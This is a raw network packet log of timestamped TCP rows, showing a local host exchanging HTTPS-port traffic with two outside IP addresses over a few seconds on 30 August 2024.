Aug 30, 2024 09:27:59.657037020 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.657044888 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.661290884 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.675825119 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.675849915 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.675961971 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.675971031 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.676034927 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.719665051 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.719688892 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.719760895 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.719769001 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.719825029 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.743165016 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.743197918 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.743328094 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.743339062 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.743386984 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744175911 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744199038 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744240046 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744245052 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744261026 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744299889 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744364977 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744378090 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744416952 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744421005 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744452953 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744473934 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744786978 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744812965 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744851112 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744854927 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.744884968 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.744901896 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.745148897 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.745163918 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.745217085 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.745222092 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.745264053 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.745532990 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.745549917 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.745596886 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.745601892 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.745641947 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.764421940 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.764446974 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.764581919 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.764592886 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.764702082 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.808125019 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.808151960 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.808291912 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.808304071 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.808351994 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.831882000 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.831899881 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.831995964 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.832010031 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.832086086 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.832696915 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.832717896 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.832761049 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.832767010 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.832801104 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.832818985 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833015919 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833030939 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833067894 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833076954 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833100080 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833117962 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833502054 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833518028 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833585024 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833590984 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833631992 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833724022 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833741903 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833791971 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.833796978 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.833839893 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.834099054 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.834119081 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.834160089 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.834166050 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.834193945 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.834202051 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.853086948 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.853104115 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.853250980 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.853264093 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.853329897 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.896859884 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.896898985 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.897036076 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.897046089 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.897084951 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.920387030 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.920423031 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.920665979 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.920686960 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.920772076 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.921281099 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.921305895 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.921374083 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.921380997 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.921426058 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.921658993 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.921685934 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.921757936 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.921762943 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.921807051 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.922008038 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922027111 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922077894 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.922084093 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922125101 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.922362089 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922379971 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922436953 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.922441959 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922496080 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.922816992 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922841072 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922902107 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.922907114 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.922949076 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.941772938 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.941800117 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.941945076 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.941967010 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.942065954 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.985620975 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.985646963 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.985780001 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.985796928 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.985842943 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.009103060 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.009130955 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.009278059 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.009300947 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.009354115 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.009928942 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.009943962 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010011911 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.010016918 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010061979 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.010236025 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010248899 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010298014 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.010305882 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010330915 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.010349989 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.010677099 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010690928 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010756969 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.010771036 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.010818005 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.011055946 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.011069059 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.011132002 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.011137009 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.011187077 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.011373997 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.011388063 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.011441946 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.011445999 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.011481047 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.011503935 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.030595064 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.030618906 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.030781031 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.030796051 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.030844927 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.074259043 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.074289083 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.074444056 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.074467897 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.074520111 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.097698927 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.097723961 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.097877026 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.097896099 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.097938061 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.098517895 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.098540068 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.098582029 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.098593950 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.098620892 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.098638058 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.099009037 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099029064 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099098921 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.099107981 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099143028 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.099287033 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099302053 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099360943 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.099368095 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099401951 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.099737883 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099751949 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099821091 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.099828959 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.099870920 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.100003004 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.100018024 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.100078106 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.100081921 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.100125074 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.128019094 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.128043890 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.128148079 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.128156900 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.128207922 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.163104057 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.163131952 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.163254023 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.163268089 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.163321018 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.186475992 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.186501980 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.186608076 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.186615944 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.186657906 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.187153101 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187172890 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187233925 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.187237978 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187277079 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.187462091 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187477112 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187530041 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.187535048 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187575102 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.187856913 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187871933 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187930107 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.187935114 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.187973976 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.188420057 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.188437939 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.188498974 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.188505888 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.188513994 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.188543081 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.188688040 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.188702106 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.188767910 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.188772917 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.188811064 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.218173027 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.218199968 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.218359947 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.218389034 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.218444109 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.251805067 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.251838923 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.251998901 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.252022028 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.252069950 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.275161982 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.275191069 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.275321007 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.275346994 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.275393009 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.275852919 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.275867939 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276030064 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.276037931 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276077986 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.276164055 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276180029 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276236057 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.276240110 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276282072 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.276606083 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276623011 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276680946 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.276688099 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276726007 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.276941061 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.276958942 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.277014017 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.277019024 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.277054071 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.277414083 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.277429104 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.277488947 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.277496099 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.277532101 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.305819035 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.305839062 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.305929899 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.305941105 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.305984020 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.340471029 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.340501070 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.340663910 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.340684891 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.340734959 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.363895893 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.363920927 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.364025116 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.364034891 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.364078999 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.364353895 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.364404917 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.364423037 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.364429951 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:28:00.364470959 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.364496946 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.370400906 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:28:00.733772039 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:00.733820915 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:00.733894110 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:00.734430075 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:00.734442949 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.038861990 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.038994074 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.041938066 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.041951895 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.042232990 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.043060064 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.088505983 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.450011969 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.491148949 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.491168022 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.541820049 CEST	49731	443	192.168.2.4	78.142.208.13
Aug 30, 2024 09:28:02.589066982 CEST	443	49731	78.142.208.13	192.168.2.4
Aug 30, 2024 09:28:02.589104891 CEST	443	49731	78.142.208.13	192.168.2.4
